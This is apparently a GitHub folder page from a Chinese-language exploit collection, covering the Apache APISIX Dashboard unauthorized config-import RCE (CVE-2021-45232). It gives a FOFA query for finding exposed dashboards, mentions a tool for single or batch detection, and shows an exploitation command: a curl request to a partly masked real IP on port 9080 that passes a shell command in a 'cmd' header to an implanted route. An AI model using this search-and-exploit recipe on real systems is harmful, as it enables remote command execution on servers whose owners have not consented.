Skip to content

Latest commit

 

History

History
 
 

2022_01_02_Apache APISIX Dashboard未授权导入配置文件RCE漏洞(CVE-2021-45232)

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

FOFA

title="Apache APISIX Dashboard"

检测

工具支持单目标或批量检测,具体用法见工具

利用

注意:利用时的端口号不再是9000,而是9080
curl http://114.67.xx.xx:9080/4ra7NZ -H "cmd: ls -alh"